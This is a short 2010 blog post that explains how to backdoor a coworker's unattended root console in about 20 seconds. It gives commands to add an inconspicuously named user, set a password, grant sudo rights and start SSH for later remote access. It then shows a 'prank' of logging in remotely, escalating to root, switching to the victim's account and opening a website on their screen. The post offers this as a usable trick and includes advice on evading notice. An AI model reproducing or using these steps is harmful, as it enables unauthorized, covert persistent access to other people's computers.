Tuesday, December 14, 2010

The 20-second challenge - Part I

Say a coworker left his computer unattended, with a root console opened. He is about to come back (you can hear its footsteps in the corridor). You have approximatively 20 seconds to backdoor his computer. What do you do ?

Here is the most straightforward trick:

$ useradd -g users, wheel -s /bin/bash sysadm
$ passwd sysadm
$ visudo
$ /etc/init.d/ssh start

This way you:
- create a new user. The name has to look "normal", you should avoid "l33th4xx".
- set its password.
- add your newly created user to the sudoers file.
- start the ssh server, so you can come back later.

First prank:
$ [come back to your office]
$ ssh sysadm@my-stupid-coworker
$ sudo su
$ su my-stupid-coworker
$ export DISPLAY=:0.0 && firefox http://bonjourmadame.fr

No need for explanation ;-)

Hopefully we'll come back for more tricks / pranks / anti-coworker-pranks.

No comments:

Post a Comment